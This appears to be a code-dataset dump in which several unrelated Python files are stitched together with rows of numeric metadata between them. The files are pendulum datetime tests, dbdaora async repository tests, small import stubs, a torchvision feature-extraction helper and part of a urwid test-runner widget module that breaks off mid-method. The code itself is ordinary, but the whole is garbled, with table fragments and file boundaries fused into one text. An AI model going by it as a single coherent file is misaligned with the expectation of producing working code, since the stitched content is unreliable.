    assert anchor.closest(after, before) == before
    candidates = [
        pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=h)
        for h in range(4)
    ]
    assert anchor.closest(*candidates) == candidates[0]
    assert anchor.closest(*candidates[::-1]) == candidates[0]


def test_closest_with_datetime():
    """closest() also accepts naive stdlib datetimes."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    naive_before = datetime(2015, 5, 28, 11, 0, 0)
    naive_after = datetime(2015, 5, 28, 14, 0, 0)
    assert_datetime(
        anchor.closest(naive_before, naive_after), 2015, 5, 28, 11, 0, 0
    )
    candidates = [
        pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=h)
        for h in range(4)
    ]
    assert_datetime(
        anchor.closest(naive_before, naive_after, *candidates),
        2015, 5, 28, 11, 0, 0,
    )


def test_closest_with_equals():
    """A candidate equal to the instance is the closest one."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    equal = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    later = pendulum.datetime(2015, 5, 28, 14, 0, 0)
    assert anchor.closest(equal, later) == equal
def test_farthest():
    """farthest() picks the candidate furthest from the instance."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    near = pendulum.datetime(2015, 5, 28, 11, 0, 0)
    far = pendulum.datetime(2015, 5, 28, 14, 0, 0)
    assert anchor.farthest(near, far) == far
    assert anchor.farthest(far, near) == far
    candidates = [
        pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=h)
        for h in range(4)
    ]
    assert anchor.farthest(*candidates) == candidates[-1]
    assert anchor.farthest(*candidates[::-1]) == candidates[-1]
    distant_past = pendulum.datetime(2010, 1, 1, 0, 0, 0)
    assert distant_past == anchor.farthest(distant_past, *candidates)


def test_farthest_with_datetime():
    """farthest() also accepts aware stdlib datetimes."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    aware_near = datetime(2015, 5, 28, 11, 0, 0, tzinfo=pendulum.UTC)
    aware_far = datetime(2015, 5, 28, 14, 0, 0, tzinfo=pendulum.UTC)
    assert_datetime(
        anchor.farthest(aware_near, aware_far), 2015, 5, 28, 14, 0, 0
    )
    candidates = [
        pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=h)
        for h in range(4)
    ]
    assert_datetime(
        anchor.farthest(aware_near, aware_far, *candidates),
        2015, 5, 28, 19, 0, 0,
    )


def test_farthest_with_equals():
    """A candidate equal to the instance is never the farthest one."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    equal = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    later = pendulum.datetime(2015, 5, 28, 14, 0, 0)
    assert anchor.farthest(equal, later) == later
    candidates = [
        pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=h)
        for h in range(4)
    ]
    assert anchor.farthest(equal, later, *candidates) == candidates[-1]
def test_is_same_day():
    """is_same_day() works against both pendulum and stdlib datetimes."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    assert not anchor.is_same_day(pendulum.datetime(2015, 5, 29, 12, 0, 0))
    assert anchor.is_same_day(pendulum.datetime(2015, 5, 28, 12, 0, 0))
    assert anchor.is_same_day(datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC))
    assert not anchor.is_same_day(
        datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
    )


def test_comparison_to_unsupported():
    """Comparing to a non-datetime is inequality, never an exception."""
    now = pendulum.now()
    assert now != 'test'
    assert now not in ['test']
| 29.468493
| 99
| 0.637226
| 1,694
| 10,756
| 3.942739
| 0.051358
| 0.184459
| 0.140141
| 0.121575
| 0.877377
| 0.849678
| 0.825722
| 0.818536
| 0.80566
| 0.793233
| 0
| 0.148241
| 0.217925
| 10,756
| 364
| 100
| 29.549451
| 0.645744
| 0
| 0
| 0.669323
| 0
| 0
| 0.049554
| 0
| 0
| 0
| 0
| 0
| 0.314741
| 1
| 0.139442
| false
| 0
| 0.015936
| 0
| 0.155378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40896a49e8a9d3a6dbc4283ab3c30866b79f8155
| 11,473
|
py
|
Python
|
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 21
|
2019-10-14T14:33:33.000Z
|
2022-02-11T04:43:07.000Z
|
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | null | null | null |
dbdaora/hash/_tests/mongodb/test_integration_service_hash_aioredis_mongodb_get_many.py
|
dutradda/sqldataclass
|
5c87a3818e9d736bbf5e1438edc5929a2f5acd3f
|
[
"MIT"
] | 1
|
2019-09-29T23:51:44.000Z
|
2019-09-29T23:51:44.000Z
|
import itertools
import asynctest
import pytest
from aioredis import RedisError
from jsondaora import dataclasses
@pytest.mark.asyncio
async def test_should_get_many(
    fake_service,
    serialized_fake_entity,
    fake_entity,
    serialized_fake_entity2,
    fake_entity2,
):
    """get_many yields the entities stored as redis hashes, in request order."""
    memory = fake_service.repository.memory_data_source
    await memory.delete('fake:other_fake:fake')
    await memory.delete('fake:other_fake:fake2')
    await memory.hmset(
        'fake:other_fake:fake',
        *itertools.chain(*serialized_fake_entity.items()),
    )
    await memory.hmset(
        'fake:other_fake:fake2',
        *itertools.chain(*serialized_fake_entity2.items()),
    )
    results = []
    async for entity in fake_service.get_many(
        'fake', 'fake2', other_id='other_fake'
    ):
        results.append(entity)
    assert results == [fake_entity, fake_entity2]
@pytest.mark.asyncio
async def test_should_get_many_from_cache(
    fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
    """Entities already in the service cache must not hit the memory source."""
    fake_service.repository.memory_data_source.hgetall = (
        asynctest.CoroutineMock()
    )
    fake_service.cache['fakeother_idother_fake'] = fake_entity
    fake_service.cache['fake2other_idother_fake'] = fake_entity2
    results = []
    async for entity in fake_service.get_many(
        'fake', 'fake2', other_id='other_fake'
    ):
        results.append(entity)
    assert results == [fake_entity, fake_entity2]
    assert not fake_service.repository.memory_data_source.hgetall.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_when_not_found_on_memory(
    fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
    """When memory has no data, get_many reads from the fallback source and
    repopulates the memory source with what it found."""
    # Clear both the data keys and the not-found markers so the repository
    # must consult the fallback source.
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake2'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:not-found:other_fake:fake'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:not-found:other_fake:fake2'
    )
    await fake_service.repository.fallback_data_source.put(
        fake_service.repository.fallback_data_source.make_key(
            'fake', 'other_fake:fake'
        ),
        dataclasses.asdict(fake_entity),
    )
    await fake_service.repository.fallback_data_source.put(
        fake_service.repository.fallback_data_source.make_key(
            'fake', 'other_fake:fake2'
        ),
        dataclasses.asdict(fake_entity2),
    )
    entities = [
        e
        async for e in fake_service.get_many(
            'fake', 'fake2', other_id='other_fake'
        )
    ]
    assert entities == [fake_entity, fake_entity2]
    # Bug fix: `exists` is a coroutine function; without `await` these
    # assertions checked the truthiness of the coroutine object and always
    # passed (cf. the awaited `exists` calls elsewhere in this module).
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake'
    )
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake2'
    )
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_when_not_found_on_memory_with_fields(
    fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
    """Field-limited get_many also falls back to the fallback source and
    repopulates the memory source."""
    # Clear both the data keys and the not-found markers so the repository
    # must consult the fallback source.
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake2'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:not-found:other_fake:fake'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:not-found:other_fake:fake2'
    )
    await fake_service.repository.fallback_data_source.put(
        fake_service.repository.fallback_data_source.make_key(
            'fake', 'other_fake:fake'
        ),
        dataclasses.asdict(fake_entity),
    )
    await fake_service.repository.fallback_data_source.put(
        fake_service.repository.fallback_data_source.make_key(
            'fake', 'other_fake:fake2'
        ),
        dataclasses.asdict(fake_entity2),
    )
    # Attributes not listed in `fields` are expected to come back as None.
    fake_entity.number = None
    fake_entity.boolean = None
    fake_entity2.number = None
    fake_entity2.boolean = None
    entities = [
        e
        async for e in fake_service.get_many(
            'fake',
            'fake2',
            other_id='other_fake',
            fields=['id', 'other_id', 'integer', 'inner_entities'],
        )
    ]
    assert entities == [fake_entity, fake_entity2]
    # Bug fix: `exists` is a coroutine function; without `await` these
    # assertions checked the truthiness of the coroutine object and always
    # passed (cf. the awaited `exists` calls elsewhere in this module).
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake'
    )
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake2'
    )
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_after_open_circuit_breaker(
    fake_service, fake_entity, fake_entity2, mocker
):
    """When redis errors open the circuit breaker, data comes from fallback
    and a warning is logged per entity."""
    fake_service.repository.memory_data_source.hgetall = asynctest.CoroutineMock(
        side_effect=RedisError
    )
    fallback = fake_service.repository.fallback_data_source
    await fallback.put(
        fallback.make_key('fake', 'other_fake', 'fake'),
        dataclasses.asdict(fake_entity),
    )
    await fallback.put(
        fallback.make_key('fake', 'other_fake', 'fake2'),
        dataclasses.asdict(fake_entity2),
    )
    results = []
    async for entity in fake_service.get_many(
        'fake', 'fake2', other_id='other_fake'
    ):
        results.append(entity)
    assert results == [fake_entity, fake_entity2]
    assert fake_service.logger.warning.call_count == 2
@pytest.mark.asyncio
async def test_should_get_many_with_fields(
    fake_service,
    serialized_fake_entity,
    fake_entity,
    serialized_fake_entity2,
    fake_entity2,
):
    """Restricting `fields` leaves the unselected attributes as None."""
    memory = fake_service.repository.memory_data_source
    await memory.hmset(
        'fake:other_fake:fake',
        *itertools.chain(*serialized_fake_entity.items()),
    )
    await memory.hmset(
        'fake:other_fake:fake2',
        *itertools.chain(*serialized_fake_entity2.items()),
    )
    results = []
    async for entity in fake_service.get_many(
        'fake',
        'fake2',
        fields=['id', 'other_id', 'integer', 'inner_entities'],
        other_id='other_fake',
    ):
        results.append(entity)
    for expected in (fake_entity, fake_entity2):
        expected.number = None
        expected.boolean = None
    assert results == [fake_entity, fake_entity2]
@pytest.mark.asyncio
async def test_should_get_many_from_cache_with_fields(
    fake_service, serialized_fake_entity, fake_entity, fake_entity2
):
    """Field-limited reads served from the cache must not hit the memory
    source; unselected attributes come back as None."""
    fake_service.repository.memory_data_source.hgetall = (
        asynctest.CoroutineMock()
    )
    fake_service.cache[
        'fakeidother_idintegerinner_entitiesother_idother_fake'
    ] = fake_entity
    fake_service.cache[
        'fake2idother_idintegerinner_entitiesother_idother_fake'
    ] = fake_entity2
    results = []
    async for entity in fake_service.get_many(
        'fake',
        'fake2',
        fields=['id', 'other_id', 'integer', 'inner_entities'],
        other_id='other_fake',
    ):
        results.append(entity)
    for expected in (fake_entity, fake_entity2):
        expected.number = None
        expected.boolean = None
    assert results == [fake_entity, fake_entity2]
    assert not fake_service.repository.memory_data_source.hgetall.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_after_open_circuit_breaker_with_fields(
    fake_service, fake_entity, fake_entity2, mocker
):
    """Field-limited reads also fall back when the circuit breaker opens."""
    fake_service.repository.memory_data_source.hmget = asynctest.CoroutineMock(
        side_effect=RedisError
    )
    fallback = fake_service.repository.fallback_data_source
    await fallback.put(
        fallback.make_key('fake', 'fake'), dataclasses.asdict(fake_entity)
    )
    await fallback.put(
        fallback.make_key('fake', 'fake2'), dataclasses.asdict(fake_entity2)
    )
    for expected in (fake_entity, fake_entity2):
        expected.number = None
        expected.boolean = None
    results = []
    async for entity in fake_service.get_many(
        'fake',
        'fake2',
        fields=['id', 'other_id', 'integer', 'inner_entities'],
        other_id='other_fake',
    ):
        results.append(entity)
    assert results == [fake_entity, fake_entity2]
    assert fake_service.logger.warning.call_count == 2
@pytest.mark.asyncio
async def test_should_get_many_from_cache_memory_and_fallback(
    fake_service, fake_entity, fake_entity2, fake_entity3
):
    """Read entities back in growing batches after adding them through the
    service: memory starts empty (per the `not ... exists` asserts below)
    and ends up repopulated once the reads complete.
    """
    # Start from a clean memory source for all three keys.
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake2'
    )
    await fake_service.repository.memory_data_source.delete(
        'fake:other_fake:fake3'
    )
    await fake_service.add(fake_entity)
    await fake_service.add(fake_entity2)
    await fake_service.add(fake_entity3)
    # After add(), none of the entities is present in the memory source yet.
    assert not await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake'
    )
    assert not await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake2'
    )
    assert not await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake3'
    )
    # Batch of one, then two, then three ids — each read returns exactly the
    # requested entities in order.
    entities = [
        e async for e in fake_service.get_many('fake', other_id='other_fake')
    ]
    assert entities == [fake_entity]
    entities = [
        e
        async for e in fake_service.get_many(
            'fake', 'fake2', other_id='other_fake'
        )
    ]
    assert entities == [fake_entity, fake_entity2]
    entities = [
        e
        async for e in fake_service.get_many(
            'fake', 'fake2', 'fake3', other_id='other_fake'
        )
    ]
    assert entities == [fake_entity, fake_entity2, fake_entity3]
    # The reads repopulated the memory source.
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake'
    )
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake2'
    )
    assert await fake_service.repository.memory_data_source.exists(
        'fake:other_fake:fake3'
    )
@pytest.mark.asyncio
async def test_should_get_many_from_cache_when_not_found_some_entities(
    fake_service, fake_entity
):
    """Missing ids are silently skipped in the async stream."""
    for fake_id in ('fake', 'fake2', 'fake3'):
        await fake_service.delete(fake_id, other_id='other_fake')
    await fake_service.add(fake_entity)
    results = [
        e async for e in fake_service.get_many('fake', other_id='other_fake')
    ]
    assert results == [fake_entity]
    results = []
    async for entity in fake_service.get_many(
        'fake', 'fake2', 'fake3', other_id='other_fake'
    ):
        results.append(entity)
    assert results == [fake_entity]
@pytest.mark.asyncio
async def test_should_get_many_empty(fake_service):
    """get_many over ids with no stored entities yields nothing."""
    for fake_id in ('fake', 'fake2', 'fake3'):
        await fake_service.delete(fake_id, other_id='other_fake')
    results = []
    async for entity in fake_service.get_many(
        'fake', 'fake2', 'fake3', other_id='other_fake'
    ):
        results.append(entity)
    assert results == []
| 29.877604
| 84
| 0.683605
| 1,396
| 11,473
| 5.266476
| 0.061605
| 0.134657
| 0.139962
| 0.121192
| 0.967764
| 0.95185
| 0.939336
| 0.922334
| 0.922334
| 0.908596
| 0
| 0.009306
| 0.22261
| 11,473
| 383
| 85
| 29.955614
| 0.815002
| 0
| 0
| 0.663717
| 0
| 0
| 0.118714
| 0.047677
| 0
| 0
| 0
| 0
| 0.082596
| 1
| 0
| false
| 0
| 0.014749
| 0
| 0.014749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
40b322299f9c1736928f3955c4f8268de303d171
| 140
|
py
|
Python
|
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
start_app/models.py
|
noobiept-other/init_django
|
a305e1b0b289bfa166638372163fd460fc30a938
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.core.urlresolvers import reverse
| 35
| 44
| 0.857143
| 21
| 140
| 5.714286
| 0.571429
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 140
| 4
| 44
| 35
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
40d277f259a7b302db5872c8114fe7ac1c4c45a1
| 208
|
py
|
Python
|
lmnotify/__init__.py
|
alexrockt/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | 6
|
2017-02-17T18:49:52.000Z
|
2018-02-25T12:53:00.000Z
|
lmnotify/__init__.py
|
r-xela/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | null | null | null |
lmnotify/__init__.py
|
r-xela/lmnotify
|
e21feb615c13eda12534b3de884bf73ea15736b2
|
[
"MIT"
] | null | null | null |
# Public API of the lmnotify package; the names are re-exported from the
# submodules imported below.
__all__ = [
    "LaMetricManager", "SimpleFrame", "GoalFrame", "SpikeChart",
    "Sound", "Model"
]
from .lmnotify import LaMetricManager
from .models import SimpleFrame, GoalFrame, SpikeChart, Sound, Model
| 26
| 68
| 0.725962
| 19
| 208
| 7.736842
| 0.578947
| 0.272109
| 0.408163
| 0.47619
| 0.544218
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149038
| 208
| 7
| 69
| 29.714286
| 0.830508
| 0
| 0
| 0
| 0
| 0
| 0.264423
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
908318735f9fe1030170605522c852bf4b3398a7
| 3,657
|
py
|
Python
|
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | 4
|
2021-11-29T15:02:57.000Z
|
2022-03-31T07:25:50.000Z
|
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | null | null | null |
models/backbone.py
|
Xpitfire/bpda
|
36e99cd8390b8a960ca42ffb83a85d15ab6ee9a0
|
[
"MIT"
] | null | null | null |
import torch
import torchvision.models as models
def set_gradients_enabled(config, model):
    """Enable or disable gradient computation for every parameter of *model*.

    The flag comes from ``config.backbone.trainable``: when False the
    backbone is frozen (no parameter receives gradients).
    """
    # Fix: message previously read 'Enbable backbone gradients'.
    print('Enable backbone gradients: ', config.backbone.trainable)
    for param in model.parameters():
        param.requires_grad = config.backbone.trainable
def register_domain_adaptation_features_extraction(config, model):
    """Attach a forward hook on the configured feature layer and return a
    ``features(x)`` callable that runs the model and yields that layer's
    output (detached from the graph when the backbone is frozen).
    """
    print('Registered feature extraction hook')
    captured = {}

    def _capture(module, inputs, output):
        # Keep the autograd graph only when backbone gradients are wanted.
        value = output if config.backbone.trainable else output.detach()
        captured[config.backbone.feature_layer] = value

    getattr(model, config.backbone.feature_layer).register_forward_hook(_capture)

    def features(x):
        if config.backbone.trainable:
            model(x)
        else:
            # frozen backbone: skip gradient bookkeeping during the forward
            with torch.no_grad():
                model(x)
        return captured[config.backbone.feature_layer]

    return features
def register_resnet_features_extraction(config, model):
    """Hook the configured ResNet feature layer; return ``features(x)`` which
    runs the model and yields that layer's output (detached when frozen).

    NOTE(review): byte-for-byte the same logic as
    register_domain_adaptation_features_extraction — candidate for merging.
    """
    print('Registered feature extraction hook')
    captured = {}

    def _store(module, inputs, output):
        # Detach unless the backbone participates in training.
        captured[config.backbone.feature_layer] = (
            output if config.backbone.trainable else output.detach()
        )

    getattr(model, config.backbone.feature_layer).register_forward_hook(_store)

    def features(x):
        if config.backbone.trainable:
            model(x)
        else:
            # don't compute gradients if not trainable
            with torch.no_grad():
                model(x)
        return captured[config.backbone.feature_layer]

    return features
def register_alexnet_features_extraction(config, model):
    """Hook one sub-module (``feature_layer_idx``) of the configured AlexNet
    feature block; return ``features(x)`` yielding its output (detached
    when the backbone is frozen).
    """
    print('Registered feature extraction hook')
    captured = {}

    def _store(module, inputs, output):
        # Detach unless the backbone participates in training.
        captured[config.backbone.feature_layer] = (
            output if config.backbone.trainable else output.detach()
        )

    layer_block = getattr(model, config.backbone.feature_layer)
    layer_block[config.backbone.feature_layer_idx].register_forward_hook(_store)

    def features(x):
        if config.backbone.trainable:
            model(x)
        else:
            # don't compute gradients if not trainable
            with torch.no_grad():
                model(x)
        return captured[config.backbone.feature_layer]

    return features
def get_backbone(config):
    """Instantiate the torchvision backbone named by ``config.backbone.model``.

    Returns ``(extractor, model, params, num_features)`` where ``extractor``
    is the feature-extraction closure registered on the configured feature
    layer and ``num_features`` is that layer's last parameter's leading size.
    Raises NotImplementedError for unknown backbone names.
    """
    model = None
    params = None
    num_features = None
    backbone_name = config.backbone.model
    if backbone_name == "resnet18":
        print('Selected ResNet18 backbone')
        model = models.resnet18(pretrained=config.backbone.pretrained)
        if config.debug:
            print(model)
        model = model.to(config.device)
        params = model.parameters()
        layer_params = list(
            getattr(model, config.backbone.feature_layer).parameters()
        )
        num_features = layer_params[-1].shape[0]
        set_gradients_enabled(config, model)
        extractor = register_resnet_features_extraction(config, model)
    elif backbone_name == "alexnet":
        print('Selected AlexNet backbone')
        model = models.alexnet(pretrained=config.backbone.pretrained)
        if config.debug:
            print(model)
        model = model.to(config.device)
        params = model.parameters()
        layer_block = getattr(model, config.backbone.feature_layer)
        layer_params = list(
            layer_block[config.backbone.feature_layer_idx].parameters()
        )
        num_features = layer_params[-1].shape[0]
        set_gradients_enabled(config, model)
        extractor = register_alexnet_features_extraction(config, model)
    else:
        raise NotImplementedError("Not Implemented!")
    return extractor, model, params, num_features
| 39.322581
| 135
| 0.686081
| 415
| 3,657
| 5.884337
| 0.163855
| 0.143325
| 0.111794
| 0.138411
| 0.806716
| 0.794431
| 0.760033
| 0.760033
| 0.760033
| 0.760033
| 0
| 0.003517
| 0.222587
| 3,657
| 92
| 136
| 39.75
| 0.855434
| 0.033361
| 0
| 0.670886
| 0
| 0
| 0.06004
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177215
| false
| 0
| 0.025316
| 0
| 0.329114
| 0.101266
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90930e2f14c267e3795fd938d11dc92d39b9c2dd
| 130
|
py
|
Python
|
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | 5
|
2021-05-19T05:38:38.000Z
|
2022-03-14T15:38:24.000Z
|
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | null | null | null |
cellcutter/alpha/ops/__init__.py
|
jiyuuchc/cellcutter
|
b5c7aac06b287407d3500e27289fa8cb0b248ef9
|
[
"MIT"
] | 1
|
2022-03-25T04:34:19.000Z
|
2022-03-25T04:34:19.000Z
|
from .boxes import *
from .clustering import *
from .common import *
from .proposal_generator import *
from .box_matcher import *
| 21.666667
| 33
| 0.769231
| 17
| 130
| 5.764706
| 0.529412
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 5
| 34
| 26
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
90b48bc52c83e3b7d611f715c281aa01a356dc28
| 12,815
|
py
|
Python
|
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
balto/displayer/curses_widgets.py
|
Gnonpi/balto
|
18d51f0a6ba90bc2083b34518d1ced5c2e86b7a0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018-2019 by Boris Feld
from __future__ import print_function
from contextlib import suppress
import urwid
from balto.suite import TestSuite
# Shared footer widgets: a status line next to a progress bar.  The bar's
# "pg normal"/"pg complete" attribute names are defined in PALETTE below.
STATUS = urwid.Text("")
PROGRESS_BAR = urwid.ProgressBar("pg normal", "pg complete", 0, 1)
FOOTER = urwid.Columns([STATUS, PROGRESS_BAR])
# Module-wide set of currently selected test ids; nodes read and write it
# (presumably (suite, key) tuples, per SingleTestNode.test_id — confirm).
SELECTED_TEST = set()
def set_selected_tests(tests):
    """Replace the module-level selection with a fresh set built from *tests*."""
    global SELECTED_TEST
    SELECTED_TEST = set(tests)
def get_selected_tests():
    """Return the module-level set of currently selected test ids.

    The previous ``global SELECTED_TEST`` declaration was removed: ``global``
    is only needed for assignment, not for reading a module-level name.
    """
    return SELECTED_TEST
# urwid display palette: (attribute name, foreground, background, ...).
# "focus *" entries style the row under the cursor; outcome entries color a
# test row after its last result.
PALETTE = [
    ("body", "black", "light gray"),
    ("flagged", "black", "dark green", ("bold", "underline")),
    ("focus", "light gray", "dark blue", "standout"),
    ("focus Passing", "light green", "dark blue", "standout"),
    ("focus Failing", "light red", "dark blue", "standout"),
    ("flagged focus", "yellow", "dark cyan", ("bold", "standout", "underline")),
    ("head", "yellow", "black", "standout"),
    ("foot", "light gray", "black"),
    ("key", "light cyan", "black", "underline"),
    ("title", "white", "black", "bold"),
    ("dirmark", "black", "dark cyan", "bold"),
    ("flag", "dark gray", "light gray"),
    # Outcomes
    ("failed", "dark red", "light gray"),
    ("passed", "dark green", "light gray"),
    ("error", "dark red", "light gray"),
    ("skipped", "dark blue", "light gray"),
    ("not_run", "black", "light gray"),
    ("pg normal", "white", "black", "standout"),
    ("pg complete", "white", "dark blue"),
    ("pg smooth", "dark blue", "black"),
]
def on_flagged(test_id, flagged):
    """Keep the module-level SELECTED_TEST set in sync with a node's flag.

    Adds *test_id* when flagged, removes it otherwise.  ``set.discard``
    replaces the previous ``suppress(KeyError)`` + ``remove`` pair: it is
    already a no-op when the id is absent, which is exactly the behavior
    the suppression implemented by hand.
    """
    if flagged:
        SELECTED_TEST.add(test_id)
    else:
        SELECTED_TEST.discard(test_id)
class SingleTestWidget(urwid.TreeWidget):
    """Row widget for one test: a "[ ]"/"[x]" selection box next to the test
    name, with the row colored after the test's last outcome."""
    def __init__(self, *args, **kwargs):
        # The checkbox Text must exist before super().__init__ builds the
        # inner widget through load_inner_widget().
        self.selected_w = urwid.Text("[ ]")
        super().__init__(*args, **kwargs)
        # insert an extra AttrWrap for our own use
        self._w = urwid.AttrWrap(self._w, None)
        self.update_w()
    def selectable(self):
        # Row can take focus so keypress() receives input.
        return True
    def load_inner_widget(self):
        # Fixed 3-column checkbox, then the test name, one space apart.
        main_w = urwid.Text(self.get_display_text())
        return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
    def keypress(self, size, key):
        """allow subclasses to intercept keystrokes"""
        key = self.__super.keypress(size, key)
        if key:
            key = self.unhandled_keys(size, key)
        return key
    def unhandled_keys(self, size, key):
        """
        Override this method to intercept keystrokes in subclasses.
        Default behavior: Toggle flagged on space, ignore other keys.
        """
        if key == " ":
            self.get_node().toggle_flag()
        else:
            return key
    def update_w(self):
        """Update the attributes of self.widget based on self.flagged.

        Colors the row after the test's "outcome" value and syncs the
        checkbox with the node's flagged state.
        NOTE(review): the focus attribute is built as "focus <outcome>",
        but PALETTE defines "focus Passing"/"focus Failing" — confirm the
        outcome strings actually match those palette entries.
        """
        suite = self.get_node().get_value()
        test = suite[self.get_node()._key]
        outcome = test.get("outcome")
